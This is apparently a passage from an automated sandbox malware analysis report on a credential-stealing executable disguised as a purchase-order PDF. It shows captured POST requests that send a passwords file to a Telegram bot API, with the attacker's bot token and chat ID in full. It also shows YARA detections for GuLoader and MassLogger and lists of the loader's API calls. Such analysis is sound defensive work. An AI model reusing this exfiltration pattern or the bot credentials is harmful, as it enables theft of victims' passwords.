--===============8dd20cb4a9bb649Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-17 02:30:51 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 02:30:51 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 02:30:51 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 35 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":13521,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402651,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49898	149.154.167.220	443	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 02:30:55 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd21359d38fd7b Host: api.telegram.org Content-Length: 1090
2024-12-17 02:30:55 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 33 35 39 64 33 38 66 64 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd21359d38fd7bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-17 02:30:56 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 02:30:56 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 02:30:56 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":13522,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402656,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49907	149.154.167.220	443	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 02:30:59 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd21a2e32dbc29 Host: api.telegram.org Content-Length: 1090
2024-12-17 02:30:59 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 61 32 65 33 32 64 62 63 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd21a2e32dbc29Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-17 02:31:00 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 02:31:00 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 02:31:00 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":13523,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402660,"document":{"file_n

Target ID:	0
Start time:	21:28:55
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"
Imagebase:	0x400000
File size:	491'585 bytes
MD5 hash:	95611E69A35EAFC00725B14ABCC7CC1A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2006375263.0000000005405000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	21:29:28
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"
Imagebase:	0x400000
File size:	491'585 bytes
MD5 hash:	95611E69A35EAFC00725B14ABCC7CC1A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2918352521.0000000003F75000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	21.5%
Dynamic/Decrypted Code Coverage:	13.9%
Signature Coverage:	20.7%
Total number of Nodes:	1516
Total number of Limit Nodes:	45

Executed Functions

Function 004032A0 Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004032C2
GetVersion.KERNEL32 ref: 004032C8
#17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
OleInitialize.OLE32(00000000), ref: 0040331F
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",00000000), ref: 00403363
CharNextW.USER32(00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",00000020), ref: 0040338A

Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
DeleteFileW.KERNELBASE(1033), ref: 0040352B

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

OleUninitialize.OLE32(?), ref: 004035F6
ExitProcess.KERNEL32 ref: 00403618
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",00000000,?), ref: 0040362B
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",00000000,?), ref: 0040363A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",00000000,?), ref: 00403645
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",00000000,?), ref: 00403651
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
CopyFileW.KERNEL32(C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,0042AA28,00000001), ref: 004036DB
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
AdjustTokenPrivileges.ADVAPI32 ref: 00403776
ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
ExitProcess.KERNEL32 ref: 004037BE

Strings

Low, xrefs: 004034F8
SETUPAPI, xrefs: 004032FB
SeShutdownPrivilege, xrefs: 0040374D
UXTHEME, xrefs: 004032E7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 004034A8, 004035C8, 00403673, 0040367D
.tmp, xrefs: 0040363F
C:\Users\user\AppData\Local\Temp\, xrefs: 004034BA, 004034BF, 004034D5, 004034E1, 004034F0, 004034FD, 00403509, 00403511, 00403628, 00403639, 00403644, 00403650, 0040365D, 0040366C, 0040371D
NSIS Error, xrefs: 00403341
Error launching installer, xrefs: 004035AD
C:\Users\user\Desktop, xrefs: 0040364A, 0040364F, 0040367C
\Temp, xrefs: 004034DC
"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe", xrefs: 00403356, 0040335C, 00403553
1033, xrefs: 00403526
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi, xrefs: 004035D3
~nsu, xrefs: 00403623
USERENV, xrefs: 004032F1
TMP, xrefs: 00403512
TEMP, xrefs: 0040350A
C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe, xrefs: 004036D6

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
API String ID: 3586999533-1114614330
Opcode ID: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
Opcode Fuzzy Hash: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

Function 00404B30 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B48
GetDlgItem.USER32(?,00000408), ref: 00404B53
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
LoadBitmapW.USER32(0000006E), ref: 00404BB0
SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
DeleteObject.GDI32(00000000), ref: 00404C26
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
GetWindowLongW.USER32(?,000000F0), ref: 00404D61
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
ShowWindow.USER32(?,00000005), ref: 00404D80
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
ImageList_Destroy.COMCTL32(?), ref: 00404F50
GlobalFree.KERNEL32(?), ref: 00404F60
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
SendMessageW.USER32(?,00001102,?,?), ref: 00405082
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
ShowWindow.USER32(?,00000000), ref: 004050FF
GetDlgItem.USER32(?,000003FE), ref: 0040510A
ShowWindow.USER32(00000000), ref: 00405111

Strings

N, xrefs: 00404DBB
, xrefs: 004050E9
M, xrefs: 00404CDA

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Function 00406077 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040613A
GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
CoTaskMemFree.OLE32(?), ref: 00406220
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
lstrlenW.KERNEL32(Call,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040629E

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
Call, xrefs: 004060A1, 00406181, 004061A2, 004061B7, 004061CA, 004061E6, 00406211, 00406243, 00406249, 00406263, 00406277, 00406297, 0040629D, 004062A9, 004062DC

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1230650788
Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

Function 00405846 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 0040586F
lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 004058B7
lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 004058DA
lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 004058E0
FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 004058F0
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
FindClose.KERNEL32(00000000), ref: 0040599F

Strings

\*.*, xrefs: 004058B1
